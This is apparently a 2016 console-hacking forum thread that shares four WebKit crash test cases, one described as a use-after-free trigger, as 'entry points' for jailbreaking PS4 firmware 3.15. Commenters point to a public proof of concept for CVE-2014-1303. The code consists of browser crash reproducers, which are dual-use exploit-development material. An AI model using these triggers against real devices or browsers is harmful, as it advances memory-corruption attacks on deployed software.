Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.

PS4 3.15 Firmware Entry Point for Testing from Zecoxao

PS4 Jailbreaking       Thread starter mcmrc1       Start date Apr 10, 2016 at 12:04 PM       150      
Status
Not open for further replies.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code: 
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code: 
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the the source code from the Webkit from Sony ;)
3. Entry Point:
Code: 
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code: 
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
PS4 3.15 Firmware Entry Point.png
 
Click to expand...
mcmrc1
mcmrc1
mcmrc1
Sitting back, wait for hack...

Comments

i really wish we had all of the tweets still.. but those got deleted.. i wonder happenned with zecoxao that day.. anyway I haven't seen anymore legitimate updates from this topic yet.
 
proskopina said:
its not only about backups...its also learning the system how it works
Click to expand...
intentions are what makes it about backups tbh with you. sure a person may start off with good intentions but how easy is it to fall into the wrong path.
So far ive seen all the intentions of backups which to most is about fame nothing more. theres a define line whats right and whats wrong.
ive watched the scene go thro ups and downs enough to know what my direct course of action is
 
Chaos Kid said:
intentions are what makes it about backups tbh with you. sure a person may start off with good intentions but how easy is it to fall into the wrong path.
So far ive seen all the intentions of backups which to most is about fame nothing more. theres a define line whats right and whats wrong.
ive watched the scene go thro ups and downs enough to know what my direct course of action is
Click to expand...

hi, i cant post links, in wololo´s forum an user publicated a POC, user says:

I created a poc for CVE 2014-1303 that was originally disclosed by Liang Chen. Should work on firmwares < 2.50.

Here is the repository.


is possible works for this?
 
toni1988 said:
hi, i cant post links, in wololo´s forum an user publicated a POC, user says:

I created a poc for CVE 2014-1303 that was originally disclosed by Liang Chen. Should work on firmwares < 2.50.

Here is the repository.


is possible works for this?
Click to expand...
If your asking if the poc of running linux on the system? You need to state your question a little bit more details
 
toni1988 said:
sorry, wondered if it is possible to work on firm´s 3.xx

the gits repository is

github .com /Fire30 /PS4-2014-1303-POC (without spaces)
Click to expand...
Yes it is but only if these guys do it I won't as I know what the system is and I'm not gonna destroy a perfectly good system with there stuff
toni1988 said:
sorry, wondered if it is possible to work on firm´s 3.xx

the gits repository is

github .com /Fire30 /PS4-2014-1303-POC (without spaces)
Click to expand...
After reading thro poc I can see how this works but I see only one way for this to work on 3.xx and even i wodnt try running it like that.
 
Chaos Kid said:
Yes it is but only if these guys do it I won't as I know what the system is and I'm not gonna destroy a perfectly good system with there stuff

After reading thro poc I can see how this works but I see only one way for this to work on 3.xx and even i wodnt try running it like that.
Click to expand...

how?
 
Status
Not open for further replies.

PSXHAX Categories

PS4 Jailbreak Status
PS5 Jailbreak Status

Latest Forum Topics

Share This Page

Back
Top